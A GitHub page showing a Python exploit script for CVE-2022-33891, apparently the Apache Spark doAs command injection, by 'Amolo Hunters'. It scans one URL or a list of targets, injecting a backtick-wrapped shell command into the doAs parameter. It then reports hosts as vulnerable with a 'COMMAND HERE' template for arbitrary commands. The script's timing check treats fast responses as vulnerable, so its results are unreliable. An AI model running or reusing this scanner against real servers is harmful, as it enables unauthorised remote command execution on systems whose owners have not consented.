-
Notifications
You must be signed in to change notification settings - Fork 6
/
CVE-2022.33891.py
75 lines (69 loc) · 3.25 KB
/
CVE-2022.33891.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import requests
import argparse
def banner():
print('''\033[0;34m
_____ _ _ _____ _____ _____ _____ _____ _____ _____ _____ _____ __
/ __ \ | | | ___| / __ \| _ |/ __ \/ __ \ |____ ||____ | _ || _ |/ |
| / \/ | | | |__ ______`' / /'| |/' |`' / /'`' / /'______ / / / /\ V / | |_| |`| |
| | | | | | __|______| / / | /| | / / / / |______| \ \ \ \/ _ \ \____ | | |
| \__/\ \_/ / |___ ./ /___\ |_/ /./ /___./ /___ .___/ /.___/ / |_| |.___/ /_| |_
\____/\___/\____/ \_____/ \___/ \_____/\_____/ \____/ \____/\_____/\____/ \___/
\033[0;34m[\033[0;37mScript coded by Amolo Hunters\033[0;34m]
''')
def urlexploit(url):
if arguments.valid:
try:
r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
if r.elapsed.total_seconds() <= 8:
print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
except:
print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
pass
else:
try:
r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
if r.elapsed.total_seconds() <= 8:
print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
else:
print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
except:
print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
pass
def listexploit(file):
if arguments.valid:
f = open(file, 'r').read().splitlines()
for url in f:
try:
r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
if r.elapsed.total_seconds() <= 8:
print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
else:
print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
except:
print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
pass
else:
f = open(file, 'r').read().splitlines()
for url in f:
try:
r = requests.get(f'{url}?doAs=`sleep 7`', verify=False, timeout=10)
if r.elapsed.total_seconds() <= 8:
print(f'\033[0;32m[+] \033[0;37mVulnerable: {url}?doAs=`COMMAND HERE`')
else:
print(f'\033[0;31m[-] \033[0;37mNot vulnerable: {url}')
except:
print(f'\033[0;31m[-] \033[0;37mError trying to explore: {url}')
pass
def main():
banner()
if arguments.turl:
urlexploit(arguments.turl)
if arguments.tlist:
listexploit(arguments.tlist)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', action='store', help='target url', dest='turl', required=False)
parser.add_argument('-l','--list', action='store', help='targets list', dest='tlist', required=False)
parser.add_argument('-v', '--valid', action='store_true', help='only valid targets', dest='valid', required=False)
arguments = parser.parse_args()
main()